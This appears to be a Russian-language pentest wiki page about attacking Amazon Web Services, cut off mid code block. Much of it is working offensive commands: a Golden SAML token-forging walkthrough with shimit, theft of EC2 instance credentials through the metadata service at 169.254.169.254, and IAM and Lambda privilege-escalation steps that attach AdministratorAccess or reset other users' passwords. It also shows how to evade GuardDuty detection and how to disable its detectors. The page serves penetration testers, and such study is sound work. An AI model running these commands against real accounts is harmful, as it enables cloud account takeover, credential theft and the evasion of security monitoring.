https://aws.amazon.com/lookout-for-vision/

== Monitron ==

https://aws.amazon.com/monitron/

== Personalize ==

https://aws.amazon.com/personalize/

== Polly ==

https://aws.amazon.com/polly/

== Rekognition ==

https://aws.amazon.com/rekognition/

== SageMaker ==

https://aws.amazon.com/sagemaker/

== SageMaker Ground Truth ==

https://aws.amazon.com/sagemaker/groundtruth/

== Textract ==

https://aws.amazon.com/textract/

== Transcribe ==

https://aws.amazon.com/transcribe/

== Translate ==

https://aws.amazon.com/translate/

== Apache MXNet ==

https://aws.amazon.com/ru/mxnet/

== Deep Learning Containers ==

https://aws.amazon.com/machine-learning/containers/

== DeepComposer ==

https://aws.amazon.com/deepcomposer/

== DeepLens ==

https://aws.amazon.com/deeplens/

== DeepRacer ==

https://aws.amazon.com/deepracer/

== Inferentia ==

https://aws.amazon.com/machine-learning/inferentia/

== Panorama ==

https://aws.amazon.com/panorama/

== PyTorch ==

https://aws.amazon.com/pytorch/

== TensorFlow ==

https://aws.amazon.com/tensorflow/

== Deep Learning AMI ==

https://aws.amazon.com/machine-learning/amis/

= Утилиты =

== Вычисление ролей ==

=== enumerate-iam ===
github.com:andresriancho/enumerate-iam.git

== Эксплуатация ==

=== Golden SAML ===

Суть атаки в том, что зная ключ, которым подписываются SAML-запросы, вы можете подделать ответ и получить произвольные привилегии в SSO.

Подробнее про эксплуатацию тут: https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps

==== shimit ====
https://github.com/cyberark/shimit

Установка:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
cd /tmp
python -m pip install boto3 botocore defusedxml enum python_dateutil lxml signxml
git clone https://github.com/cyberark/shimit
cd shmit
python shmit.py
</syntaxhighlight>

В начале потребуется доступ к AD FS аккаунту из персонального хранилища которого украсть приватный ключ ключ.
Сделать это можно используя mimikatz, но в примере сделано через библиотеку Microsoft.Adfs.Powershell и powershell

Пример эксплуатации:
<syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:auto" >
# Получаем приватный ключ
[System.Convert]::ToBase64String($cer.rawdata)
(Get-ADFSProperties).Identifier.AbsoluteUri
(Get-ADFSRelyingPartyTrust).IssuanceTransformRule

# Получаем инфу о юзерах - выбираем цель
aws iam list-users

# Получаем токен
python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file
-u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012

# Проверяем текущий аккаунт
aws opsworks describe-my-user-profile
</syntaxhighlight>

== Проверки безопасности ==

Для администраторов преимущественно.

=== Zeus ===

https://github.com/DenizParlak/Zeus

== Другое ==

=== aws_consoler ===

https://github.com/NetSPI/aws_consoler

== All-In-One ==

=== pacu ===

https://github.com/RhinoSecurityLabs/pacu

=== ScoutSuite ===

https://github.com/nccgroup/ScoutSuite

=== cloudfox ===

https://github.com/BishopFox/cloudfox

= Ссылки =

== Статьи ==

[https://frichetten.com/blog/hijack-iam-roles-and-avoid-detection/ Hijacking IAM Roles and Avoiding Detection]

[https://frichetten.com/blog/bypass-guardduty-pentest-alerts/ Bypass GuardDuty PenTest Alerts]

[https://frichetten.com/blog/ssm-agent-tomfoolery/ Intercept SSM Agent Communications]

== Лаборатории ==

[https://medium.com/poka-techblog/privilege-escalation-in-the-cloud-from-ssrf-to-global-account-administrator-fd943cf5a2f6 Damn Vulnerable Cloud Application]

[https://github.com/nccgroup/sadcloud SadCloud]

[http://flaws.cloud Flaws]

[http://flaws2.cloud/ Flaws]

[https://xakep.ru/2022/03/21/htb-stacked/ HackTheBox Stacked Writeup]

[https://github.com/RhinoSecurityLabs/cloudgoat CloudGoat]

[https://github.com/nccgroup/sadcloud SadCloud]

[https://www.wellarchitectedlabs.com/security/ AWS Well-Architected Labs]

[https://labs.withsecure.com/publications/attack-detection-fundamentals-2021-aws-lab-1 Attack Detection Fundamentals 2021: AWS - Lab #1]

[https://pentesting.cloud/ Free AWS Security Labs]

== Краткие заметки ==

[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20AWS%20Pentest.md PayloadAllTheThings]

[https://book.hacktricks.xyz/pentesting/pentesting-web/buckets/aws-s3 hacktricks-s3]

[https://book.hacktricks.xyz/cloud-security/aws-security hacktricks-aws]

[https://learntocloud.guide/#/phase5/README learntocloud(много ссылок)]

== Книги ==

[https://www.amazon.com/dp/1789136725/ Hands-On AWS Penetration Testing with Kali Linux]

Aws

2022-10-18T13:21:29Z

Drakylar: /* Fraud Detector */

AWS - Amazon Web Service. Одна из первых облачных систем, состоящая из многих сервисов, которые при некорректной настройке оставляют дыры в безопасности.

= Организационные моменты =

При проведении тестирования на проникновение, требуется предупредить AWS (составить заявку).

Подробнее тут: https://aws.amazon.com/ru/security/penetration-testing/

= Общие концепции =

== Службы ==

Концепция служб в AWS позволяет автоматизировать многие процессы, включая саму разработку архитектуры.

Это экосистема многих сервисов. И AWS стремится увеличить их количество.

Например, связать сервис сбора логов и сервис по реагированию на инциденты, а результаты класть на сервис S3.

== Регионы ==

AWS разделен на регионы. Часть сервисов кросс-региональные, но большинство привязываются к конкретным регионам.

{| class="wikitable"
|+Регионы AWS
|-
| '''Название региона'''
| '''Endpoint(HTTPS)'''
|-
|us-east-2
|rds.us-east-2.amazonaws.com

rds-fips.us-east-2.api.aws

rds.us-east-2.api.aws

rds-fips.us-east-2.amazonaws.com
|-
|us-east-1
|rds.us-east-1.amazonaws.com

rds-fips.us-east-1.api.aws

rds-fips.us-east-1.amazonaws.com

rds.us-east-1.api.aws
|-
|us-west-1
|rds.us-west-1.amazonaws.com

rds.us-west-1.api.aws

rds-fips.us-west-1.amazonaws.com

rds-fips.us-west-1.api.aws
|-
|us-west-2
|rds.us-west-2.amazonaws.com

rds-fips.us-west-2.amazonaws.com

rds.us-west-2.api.aws

rds-fips.us-west-2.api.aws
|-
|af-south-1
|rds.af-south-1.amazonaws.com

rds.af-south-1.api.aws
|-
|ap-east-1
|rds.ap-east-1.amazonaws.com

rds.ap-east-1.api.aws
|-
|ap-southeast-3
|rds.ap-southeast-3.amazonaws.com
|-
|ap-south-1
|rds.ap-south-1.amazonaws.com

rds.ap-south-1.api.aws
|-
|ap-northeast-3
|rds.ap-northeast-3.amazonaws.com

rds.ap-northeast-3.api.aws
|-
|ap-northeast-2
|rds.ap-northeast-2.amazonaws.com

rds.ap-northeast-2.api.aws
|-
|ap-southeast-1
|rds.ap-southeast-1.amazonaws.com

rds.ap-southeast-1.api.aws
|-
|ap-southeast-2
|rds.ap-southeast-2.amazonaws.com

rds.ap-southeast-2.api.aws
|-
|ap-northeast-1
|rds.ap-northeast-1.amazonaws.com

rds.ap-northeast-1.api.aws
|-
|ca-central-1
|rds.ca-central-1.amazonaws.com

rds.ca-central-1.api.aws

rds-fips.ca-central-1.api.aws

rds-fips.ca-central-1.amazonaws.com
|-
|eu-central-1
|rds.eu-central-1.amazonaws.com

rds.eu-central-1.api.aws
|-
|eu-west-1
|rds.eu-west-1.amazonaws.com

rds.eu-west-1.api.aws
|-
|eu-west-2
|rds.eu-west-2.amazonaws.com

rds.eu-west-2.api.aws
|-
|eu-south-1
|rds.eu-south-1.amazonaws.com

rds.eu-south-1.api.aws
|-
|eu-west-3
|rds.eu-west-3.amazonaws.com

rds.eu-west-3.api.aws
|-
|eu-north-1
|rds.eu-north-1.amazonaws.com

rds.eu-north-1.api.aws
|-
|me-south-1
|rds.me-south-1.amazonaws.com

rds.me-south-1.api.aws
|-
|sa-east-1
|rds.sa-east-1.amazonaws.com

rds.sa-east-1.api.aws
|-
|us-gov-east-1
|rds.us-gov-east-1.amazonaws.com
|-
|us-gov-west-1
|rds.us-gov-west-1.amazonaws.com
|}

Или только регионы (могут пригодиться при переборе):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
us-east-2
us-east-1
us-west-1
us-west-2
af-south-1
ap-east-1
ap-southeast-3
ap-south-1
ap-northeast-3
ap-northeast-2
ap-southeast-1
ap-southeast-2
ap-northeast-1
ca-central-1
eu-central-1
eu-west-1
eu-west-2
eu-south-1
eu-west-3
eu-north-1
me-south-1
sa-east-1
us-gov-east-1
us-gov-west-1
</syntaxhighlight>

== Доступы ==

== Консольная утилита(awscli) ==

Чаще всего для взаимодействия с сервисами AWS вам потребуется консольная утилита awscli.

Утилита работает с настроенными профилями.

=== Файлы ===

==== ~/.aws/credentials ====

Файл с учетными данными профилей. Перефразирую: получив данные из этого файла вы, вероятнее всего, получите контроль над аккаунтами в нем.

У каждого профиля будет указан:

* Access Key ID - 20 случайных букв/цифр в верхнем регистре, часто начинается с "AKIA..."

* Access Key - 40 случайных символов различного регистра.

* Access Token - не всегда указывается

Полный список параметров можно посмотреть тут: https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-files.html#cli-configure-files-settings

Пример содержимого файла (сохранен профиль default):

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
[default]
aws_access_key_id=AKIAIOSFODNN7EXAMPLE
aws_secret_access_key=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
aws_session_token = AQoEXAMPLEH4aoAH0gNCAPyJxz4BlCFFxWNE1OPTgk5TthT+FvwqnKwRcOIfrRh3c/LTo6UDdyJwOOvEVPvLXCrrrUtdnniCEXAMPLE/IvU1dYUg2RVAJBanLiHb4IgRmpRV3zrkuWJOgQs8IZZaIv2BXIa2R4Olgk
</syntaxhighlight>

==== ~/.aws/config ====

Файл с региональными настройками профиля(регион по-умолчанию).
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
[default]
region=us-west-2
output=json
</syntaxhighlight>

==== ~/.aws/cli/cache ====

Закешированные учетные данные

==== ~/.aws/sso/cache ====

Закешированные данные Single-Sign-On

=== Команды ===

Общее построение команды выглядит как:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws <название_сервиса> <действие> <дополнительные_аргументы>
</syntaxhighlight>

Примеры:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Вывести все S3-хранилища.
aws s3 ls

# Создание нового пользователя - сервис IAM
aws iam create-user --user-name aws-admin2
</syntaxhighlight>

== IMDS (Instance Metadata Service) ==

Это http API для запросов из EC2. Полезно если, например, у вас есть уязвимость SSRF в EC2.

Есть 2 версии:

*IMDSv1 - версия 1 по-умолчанию, не требует токен.

*IMDSv2 - версия 2, для запросов требуется токен.

Запрос без токена:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
curl http://169.254.169.254/latest/meta-data/
</syntaxhighlight>

Запрос с токеном:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"` && curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/meta-data/
</syntaxhighlight>

Кроме доп. информации можно получить access-token для доступа в AWS с сервисного аккаунта ec2 (только для IMDSv2):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# В начале делаем запрос на директорию /security-credentials/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Потом выбираем нужный аккаунт и делаем запрос на него
http://169.254.169.254/latest/meta-data/iam/security-credentials/test-account
</syntaxhighlight>

Пример ответа:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
{
"Code" : "Success",
"LastUpdated" : "2019-12-03T07:15:34Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "xxxxxxxxxxxxxxxxxxx",
"SecretAccessKey" : "xxxxxxxxxxxxxxxxxxxxx",
"Token" : "xxxxxxxxxxxxxxxxxxxxx",
"Expiration" : "2019-12-03T13:50:22Z"
}
</syntaxhighlight>
После чего эти учетные данные можно использовать с awscli.

Другие полезные Endpoint'ы:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
http://169.254.169.254/
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/meta-data/iam/security-credentials/s3access
http://169.254.169.254/latest/dynamic/instance-identity/document
</syntaxhighlight>

= Ролевая модель =

Почти все описание доступа идет через ролд. А роли в свою очередь состоят из двух типов политик:

* trust policy - определяет, чья будет роль

* permissions policy - определяет какой доступ будет у тех, у кого эта роль.

Каждая политика состоит из следующих компонентов:

* Ресурс - цель, кому выдается правило. Может быть:
** Пользователь
** Группа, в которой могут быть аккаунты по какому то признаку
** Другая политика.

* Роль(Action) - какое-либо действие (например, iam:ListGroupPolicies - посмотреть список груповых политик)

* Тип правила(Effect) - разрешение или запрет.

* Политика(Policy) - совокупность Роль(действие) -> разрешение/запрет -> Ресурс(кому).

* Условия(Condition) - отдельные условия, например, ip.

Пример политики:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
{
"Version": "2012-10-17", //Версия политики
"Statement": [
{
"Sid": "Stmt32894y234276923" //Опционально - уникальный идентификатор
"Effect": "Allow", //Разрешить или запретить
"Action": [ //Разрешенные/Запрещенные действия
"ec2:AttachVolume",
"ec2:DetachVolume"
],
"Resource": [ //На какие ресурсы можно/нельзя совершать действия
"arn:aws:ec2:*:*:volume/*",
"arn:aws:ec2:*:*:instance/*"
],
"Condition": { //Опционально - условия срабатывания
"ArnEquals": {"ec2:SourceInstanceARN": "arn:aws:ec2:*:*:instance/instance-id"}
}
}
]
}
</syntaxhighlight>

== Определение ролей ==

=== Вручную ===
TODO команды по определению своих ролей

=== Автоматизированно ===

== Эксплуатация ==

Когда вы определили, какие роли у вас есть, перейдите выше на соответствующий сервис, к которому идет данная роль и прочтите как ее эксплуатировать.

Тут будут отдельные роли, которые не прикреплены ни к одному сервису.

=== Административный доступ ===

Как выглядит роль с административным доступом:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
"Statement": [
{
"Effect": "Allow",
"Action": [
"*"
],
"Resource": "*"
}
]
</syntaxhighlight>

= Службы =

== IAM ==

Сервис по обеспечению контроля доступа. Подробнее про ролевую модель можно почитать в соответствующей главе.

=== Роли - повышение привилегий ===

==== iam:UpdateLoginProfile ====

Сбросить пароль у других пользователей:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam update-login-profile --user-name target_user --password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}<XT5isoE=LB2L^G@{uK>f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' --no-password-reset-required
</syntaxhighlight>

==== iam:PassRole + ec2:RunInstance ====

См. EC2

==== iam:PassRole + glue:CreateDevEndpoint ====

См. Glue

==== iam:PutRolePolicy ====

Создать или обновить inline-политику для роли.

==== iam:PutGroupPolicy ====

Создать или обновить inline-политику для группы.

==== iam:PuserUserPolicy ====

Создать или обновить inline-политику.

==== iam:UpdateAssumeRolePolicy + sts:AssumeRole ====

Обновить документ "AssumeRolePolicyDocument" для роли.

=== Роли - повышение до админа ===

==== iam:AddUserToGroup ====

Добавить юзера в административную группу:

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam add-user-to-group --group-name <название_группы> --user-name <логин>
</syntaxhighlight>

==== iam:PutUserPolicy ====

Право добавить своб политику к ранее скомпрометированным обьектам.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam put-user-policy --user-name <логин> --policy-name my_inline_policy --policy-document file://path/to/administrator/policy.json
</syntaxhighlight>

==== iam:CreateLoginProfile ====

Привилегия для создания профиля(с паролем) для аккаунта, выставить новый пароль и перейти под этого пользователя.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam create-login-profile --user-name target_user –password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}<XT5isoE=LB2L^G@{uK>f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' --no-password-reset-required
</syntaxhighlight>

==== iam:UpdateLoginProfile ====

Добавить существующую политику к любому пользователю.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-user-policy --user-name my_username --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:AttachGroupPolicy ====

Добавить существующую политику к любой группе.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-user-policy --user-name my_username --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:AttachRolePolicy ====

Добавить существующую политику к любой роли.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-role-policy --role-name role_i_can_assume --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:CreatePolicy ====

Создать административную политику.

==== iam:CreatePolicyVersion + iam:SetDefaultPolicyVersion ====

Позволяет поменять политику, выставленную администраторами сети и применить ее, после чего повысить привилегии у обьекта.

Например, если у вас это право, то вы можете создать произвольную политику, дающую полный доступ и применить ее.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание политики
aws iam create-policy-version --policy-arn target_policy_arn --policy-document file://path/to/administrator/policy.json --set-as-default
# Установка политики по умолчанию.
aws iam set-default-policy-version –policy-arn target_policy_arn –version-id v2
</syntaxhighlight>

==== iam:PassRole + ec2:CreateInstanceProfile/ec2:AddRoleToInstanceProfile ====

См. EC2

==== iam:AttachUserPolicy ====

Позволяет прикрепить политику к пользователю. Если существует политика, дающая админские права - повышение.

== AWS Shield ==

Сервис для защиты от DDoS.

== Cognito ==

Позволяет быстро и просто добавлять возможности регистрации, авторизации и контроля доступа пользователей в мобильные и интернет-приложения.

=== Основное ===

Cognito отвечает за следующие действия:

* Регистрация пользователя (email + пароль)

* Авторизация пользователя

* Работа с сохраненной пользовательской информацией (устанавливается приложением)

* Специальные действия (например, предоставление AWS-ключей)

Все общение идет по HTTP(s). Особенность системы в том, что Cognito общается как напрямую с чужим веб-сайтом, так и напрямую с клиентским браузером. То есть веб-сервер не знает, какой был передан пароль (в нормальной реализации).

Пример URL: cognito-identity.us-east-1.amazonaws.com

За действие отвечает HTTP-заголовок "X-Amz-Target". В своем роде, это Endpoints API.

Какие параметры требуются для работы с ним:

1. Название Endpoint'а - "X-Amz-Target" заголовок

2. Регион - "aws_project_region" параметр

3. Session token - позже требуется для запросов.

4. Identity Pool ID - нужен для запросов типа Identity Pools.

Также пишут, что Cognito разделяется на две основные части:

* User Pools - для тех, кому нужна только регистрация и аутентификация

* Identity Pools - для тех, кому еще и нужен доступ к AWS-ресурсам.

=== X-Amz-Target (Endpoints) ===

==== AWSCognitoIdentityService.UpdateUserAttributes ====

У каждого пользователя есть поля, которые могут быть установлены самим пользователем (например, фамилия или дата рождения). Но также это могут быть и критичные поля, такие, как ID пользователя, администратор ли он и так далее.

Также раньше можно было менять поле email'а пользователя (0day): https://infosecwriteups.com/hacking-aws-cognito-misconfiguration-to-zero-click-account-takeover-36a209a0bd8a

Важно! Указано, что могут быть отправки СМС-уведомлений, так что тестировать осторожно.

P.S. Мб неверно название Endpoint'а. Надо проверять.

==== AWSCognitoIdentityService.GetCredentialsForIdentity ====

Позволяет получить AWS ключи для работы с AWS-консолью. По-умолчанию отключено.

Требуется aws_identity_pool_id.

В некоторых примерах оно также было указано как "com.amazonaws.cognito.identity.model.AWSCognitoIdentityService.GetCredentialsForIdentity"

Подробнее тут: https://blog.appsecco.com/exploiting-weak-configurations-in-amazon-cognito-in-aws-471ce761963

==== AWSCognitoIdentityService.GetOpenIdToken ====

Позволяет получить OpenID токен, действительный на 10 минут.

В примере требуется только "IdentityID"

==== AWSCognitoIdentityService.GetOpenIdTokenForDeveloperIdentity ====

Тоже позволяет получить OpenID токен, действительный на 10 минут. Но также создает новый "IdentityID" (если он не был указан).

==== AWSCognitoIdentityService.GetCredentialsForIdentity ====

Получить учетные данные пользователя по IdentityID: SecretKey, SessionToken, AccessKeyID.

https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetCredentialsForIdentity.html

== GuardDuty ==

Сервис для детектирования атак используя машинное обучение.

Для детекта использует следующие сервисы:

* CloudTrail
* VPC Flow Logs
* DNS Logs
* ...to be continued

=== Обход защиты ===

Далее идут правила детекта и то, как их можно обойти.

==== UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration ====

Детектит, если AWS-API команды были запущены за пределами EC2 (используя токен этого EC2).

Правило эффективно, если хакер хочет украть токен с EC2 и использовать его вне EC2 (например, если есть только SSRF).

Обход простой: создать свой EC2-инстанс и делать API-запросы с полученными учетными данными жертвы.
Тогда правило не сработает, даже если учетные данные не принадлежат данной EC2 тк правило проверяет source ip и является ли он EC2.

Может быть для этого выгодно держать проксирующий сервер EC2.

==== UserAgent rules ====

Суть в том, что GuardDuty будет добавлять Alert если AWS-CLI использует UserAgent например Kali.
Варианты:

* Использовать утилиту pacu (уже есть смена User-Agent)

* Отредактировать botocore(https://github.com/boto/botocore) по пути /usr/local/lib/python3.7/dist-packages/botocore/session.py: поменять platform.release() на строку юзерагента.

=== Роли - Управление ===

Список ролей: https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazonguardduty.html

==== guardduty:UpdateDetector ====

Позволяет выключить GuardDuty (ну или редатировать правила):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
aws guardduty update-detector --detector-id <id of detector> --no-enable
</syntaxhighlight>
==== guardduty:DeleteDetector ====

Удалить правило детектирования:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
aws guardduty delete-detector --detector-id <id of detector>
</syntaxhighlight>

== STS (Security Token Service) ==

Сервис, позволяющий запросить временные учетные данные с ограниченными примилегиями для IAM-пользователей

== KMS (Key Management Service) ==

Сервис для создания криптографических ключей, управления ими и использования их в других сервисах.

Администраторы амазона не смогут получить к ним доступ.

Ключи со временем обновляются:

* Customers keys - раз в 365 дней

* AWS keys - раз в 3 года.

Старые ключи также можно будет использовать для расшифровки.

== CloudHSM (Hardware Security Module) ==

Замена KMS для богатых и тех, кто хочит побольше безопасности. Хранилище ключей, прикрепленное к аппаратному решению.

Пишут, что устройство будет закреплено только за вами.

Также можно получить доступ к CloudHSM-Instance по SSH.

== Athena ==

Интерактивный бессерверный сервис, позволяющий анализировать данные хранилища S3 стандартными средствами SQL.

Умеет работать с шифрованными S3 и сохранять шифрованный вывод.

== EBS (Elastic Block Store) ==

Сервис блочного хранилища (просто жесткий диск, который можно примонтировать).

=== Роли - управление сервисом ===

==== ec2:CreateVolume + ec2:AttachVolume ====

Возможность подключить EBS-Volume/Snapshot к EC2-виртуалке.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание Volume из snapshot'а (если требуется подключить snapshot)
aws ec2 create-volume –snapshot-id snapshot_id --availability-zone zone
# Подключение Volume к виртуалке EC2
</syntaxhighlight>

Далее идем на виртуалку и вводим команды:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Поиск Volume
lsblk
# Проверка есть ли на нем данные
sudo file -s /dev/xvdf
# форматировать образ под ext4 (если неподходящая файловая система)
sudo mkfs -t ext4 /dev/xvdf
# Создаем директорию куда примонтируем позже
sudo mkdir /tmp/newvolume
# Монтируем
sudo mount /dev/xvdf /tmp/newvolume/
</syntaxhighlight>

Диск будет доступен на /tmp/newvolume.

== Lambda ==

Сервис для запуска своего кода в облаке.

=== Роли - повышение привилегий ===

==== lambda:UpdateFunctionCode ====

Позволяет поменять запущенный код, тем самым получив контроль над ролями, прикрепленными к этому коду:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws lambda update-function-code --function-name target_function --zip-file fileb://my/lambda/code/zipped.zip
</syntaxhighlight>

==== lambda:CreateFunction + lambda:InvokeFunction + iam:PassRole ====

Позволяет создать функцию и прикрепить к ней произвольную роль, после чего запустить.

Код функции:
<syntaxhighlight lang="python" line="1" enclose="div" style="overflow-x:scroll" >
import boto3
def lambda_handler(event, context):
client = boto3.client('iam')
response = client.attach_user_policy(
UserName='my_username',
PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess"
)
return response
</syntaxhighlight>

Команды для запуска:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание функции
aws lambda create-function --function-name my_function --runtime python3.6 --role arn_of_lambda_role --handler lambda_function.lambda_handler --code file://my/python/code.py
# Запуск
aws lambda invoke --function-name my_function output.txt
</syntaxhighlight>

=== Роли - управление ===

==== lambda:GetFunction ====

Также может понадобиться lambda:ListFunctions чтобы не перебирать названия функций.

Позволяет прочитать исходный код функции (в котором например может быть секрет сохранен):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получить список функций
aws lambda list-functions --profile uploadcreds
# Получить информацию о Lambda-функции
aws lambda get-function --function-name "LAMBDA-NAME-HERE-FROM-PREVIOUS-QUERY" --query 'Code.Location' --profile uploadcreds
# Скачать исходный код по ссылке из предыдущего ответа
wget -O lambda-function.zip url-from-previous-query --profile uploadcreds
</syntaxhighlight>

== Glue ==

Бессерверная служба интеграции данных, упрощающая поиск, подготовку и объединение данных для анализа, машинного обучения и разработки приложений.

=== Роли - повышение привилегий ===

==== glue:UpdateDevEndpoint ====

Позволяет обновить параметры Glue Development Endpoint, тем самым получив контроль над ролями, прикрепленными к этому Glue Development Endpoint:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# TODO: это не обновление параметров, надо обновить команду
aws glue --endpoint-name target_endpoint --public-key file://path/to/my/public/ssh/key.pub
</syntaxhighlight>

==== glue:CreateDevEndpoint + iam:PassRole ====

Позволяет получить доступ к ролям, которые прикреплены к любому сервису Glue:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws glue create-dev-endpoint --endpoint-name my_dev_endpoint --role-arn arn_of_glue_service_role --public-key file://path/to/my/public/ssh/key.pub
</syntaxhighlight>

== S3 ==

Файловое хранилище, доступное по http(s).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{bucket_name}.s3.amazonaws.com
https://s3.amazonaws.com/{bucket_name}/

# US Standard
http://s3.amazonaws.com
# Ireland
http://s3-eu-west-1.amazonaws.com
# Northern California
http://s3-us-west-1.amazonaws.com
# Singapore
http://s3-ap-southeast-1.amazonaws.com
# Tokyo
http://s3-ap-northeast-1.amazonaws.com
</syntaxhighlight>

Делать запросы можно:

* В браузере - http(s)

* Используя awscli:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile <PROFILE_NAME>] [ --recursive] [--region us-west-2]
</syntaxhighlight>

В S3 может использоваться шифрование:

* SSE-KMS - Server-Side с ключами KMS

* SSE-C - Server-Side с ключами заказчика

* CSE-KMS - Client-Side с ключами KMS

* CSE-C - Client-Side с ключами заказчика

=== Сбор информации ===

==== Определение региона ====

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
$ dig flaws.cloud
;; ANSWER SECTION:
flaws.cloud. 5 IN A 52.218.192.11

$ nslookup 52.218.192.11
Non-authoritative answer:
11.192.218.52.in-addr.arpa name = s3-website-us-west-2.amazonaws.com

# Итоговый URL будет:
flaws.cloud.s3-website-us-west-2.amazonaws.com
flaws.cloud.s3-us-west-2.amazonaws.com
</syntaxhighlight>
Если будет некорректный регион - редиректнет на корректный.

==== Список файлов ====

На S3-Bukket может быть включен листинг директорий, для этого достаточно перейти в браузере на хранилище и посмотреть возвращенный XML.

Список файлов может быть включен отдельно на определенные директории, поэтому может потребоваться брут директорий используя, например, wfuzz (подстрока AccessDenied).

=== Роли - управление ===

==== s3:ListBucket ====

Посмотреть список файлов в S3-хранилище:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile <PROFILE_NAME>] [ --recursive] [--region us-west-2]
</syntaxhighlight>

==== s3:ListAllMyBuckets ====

Посмотреть список всех S3-хранилищ, доступных мне:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3api list-buckets
aws s3 ls
</syntaxhighlight>

== CloudFront ==

Сервис сети доставки контента (CDN).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.cloudfront.net
</syntaxhighlight>

== EC2 (Elastic Compute Cloud) ==

EC2 (Amazon Elastic Compute Cloud) == VPS

Состоит из:

* Instance - название виртуальной машины

* AMI (Amazon Machine Image) - образ виртуальной машины

* SSM Agent - программное обеспечение Amazon, которое запущено на всеx EC2-инстансах, серверах и тд.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
